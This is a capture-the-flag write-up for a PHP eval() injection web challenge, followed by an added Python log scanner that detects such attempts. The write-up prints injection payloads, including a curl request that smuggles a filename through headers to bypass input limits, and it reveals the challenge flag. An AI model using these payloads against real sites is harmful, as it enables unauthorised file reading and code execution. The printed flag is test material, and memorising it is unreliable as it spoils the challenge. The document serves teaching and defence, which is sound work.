Tags: web 

Rating: 4.0

# Web-Embedding
URL of the challenge: [Embedding](http://138.91.58.10/Embedding/)

The page has a single input box:
```html
<input name="username" placeholder="Enter Your UserName Here">
```

We tried to input
> getcwd()

The result changed to
> /var/www/html/Embedding welcome

Thus, we knew that the challenge is about <font color="#f03c15"> Eval() Vulnerability </font>

Then, we put
> print_r(scandir(getcwd()))

to get all file in this directory.

The result changed to
> Array ( \[0\] => . \[1\] => .. \[2\] => [email protected] \[3\] => index.php ) 1 welcome

From this we knew that the flag is stored in [email protected]

Before reading the source of [email protected], we should first know the constraints on the input.

Thus, we typed
> show_source(end(scandir(getcwd())))

```php
<html>
<head><title>Embedded Challenge </title> </head>
<body>
<form>
<input name="username" placeholder="Enter Your UserName Here"/>
<input type="Submit"/>
</form>
</body>
</html>

40) {
die("Bad Character Detected or you Break The Limit ");
}
$username=$_GET['username'];
$eval=eval("echo ".$username.";");
echo(" welcome ".$eval);
}
?>
```

Thus, we knew that the input may only contain\
a-z, 0-9, (, ), _, ., and ', and the string length must be smaller than 41.

First we tried
> readfile(next(array_reverse(scandir('.'))))

However, that string is 43 characters long, so it is rejected by the length limit and we cannot get the result.

Thus, we found that we can put the filename [email protected] in a request header instead of in the payload, and read it back with getallheaders(). `show_source(end(getallheaders()))` is only 33 characters and uses only allowed characters; `end()` returns the value of the last header, and curl sends a custom `-H` header after its default ones.

Then, we used the curl command in the console to get the source code of [email protected]:

> curl -s -H "Flag: [email protected]" "http://138.91.58.10/Embedding/?username=show_source(end(getallheaders()))"

```html
<html>
<head><title>Embedded Challenge </title> </head>
<body>
<form>
<input name="username" placeholder="Enter Your UserName Here"/>
<input type="Submit"/>
</form>
</body>
</html>

<?php
$flag="0xL4ugh{Z!90o_S@y_W3lC0m3}";
?>
1 welcome
```

Finally, we got the flag ^.^

> 0xL4ugh{Z!90o_S@y_W3lC0m3}
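From the defender's side (an added example, not part of the original writeup): every request in this chain carries PHP call syntax in the `username` parameter, which a real username never needs, so the whole attack is visible in the web server's access log alone. The log lines below are constructed samples modelled on the requests above; the field names and the `SENSITIVE` list are my own choices.

```python
"""Flag eval()-injection attempts against the Embedding page from access logs.
Added example; the log lines are constructed samples, not real traffic."""
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache-style access log lines (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [10/Feb/2021:12:00:01 +0000] "GET /Embedding/?username=alice HTTP/1.1" 200 512
10.0.0.7 - - [10/Feb/2021:12:00:09 +0000] "GET /Embedding/?username=getcwd() HTTP/1.1" 200 540
10.0.0.7 - - [10/Feb/2021:12:00:15 +0000] "GET /Embedding/?username=print_r(scandir(getcwd())) HTTP/1.1" 200 610
10.0.0.7 - - [10/Feb/2021:12:00:40 +0000] "GET /Embedding/?username=show_source(end(getallheaders())) HTTP/1.1" 200 900
10.0.0.9 - - [10/Feb/2021:12:01:02 +0000] "GET /Embedding/?username=o'neil HTTP/1.1" 200 512
"""

# Common log format: ip, ident, user, [timestamp], "METHOD target PROTO", status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
# An identifier directly followed by "(" is PHP call syntax; the challenge's
# character allowlist (a-z, 0-9, parentheses, _, ., ') lets exactly this through.
CALL_RE = re.compile(r'[A-Za-z_]\w*\s*\(')
# Functions used in the writeup, reported by name to speed up triage
# (assumed list; extend it for your own environment).
SENSITIVE = {"eval", "getcwd", "scandir", "show_source", "getallheaders",
             "readfile", "print_r", "system"}


def extract_username(target):
    """Return the decoded 'username' query value from a request target."""
    qs = parse_qs(urlsplit(target).query)
    return qs.get("username", [""])[0]


def scan_log(text):
    """Return (ip, username, sorted sensitive function names) per suspicious request."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        user = extract_username(m.group("target"))
        if not CALL_RE.search(user):
            continue  # plain names such as alice or o'neil are not flagged
        called = set(re.findall(r'[A-Za-z_]\w*(?=\s*\()', user))
        hits.append((m.group("ip"), user, sorted(called & SENSITIVE)))
    return hits


if __name__ == "__main__":
    for ip, payload, names in scan_log(SAMPLE_LOG):
        print(f"{ip}: {payload!r} calls {names}")
```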

Original writeup (https://github.com/JohnKHW/ctfwriteup/blob/master/0xL4ugh/Embedding.md).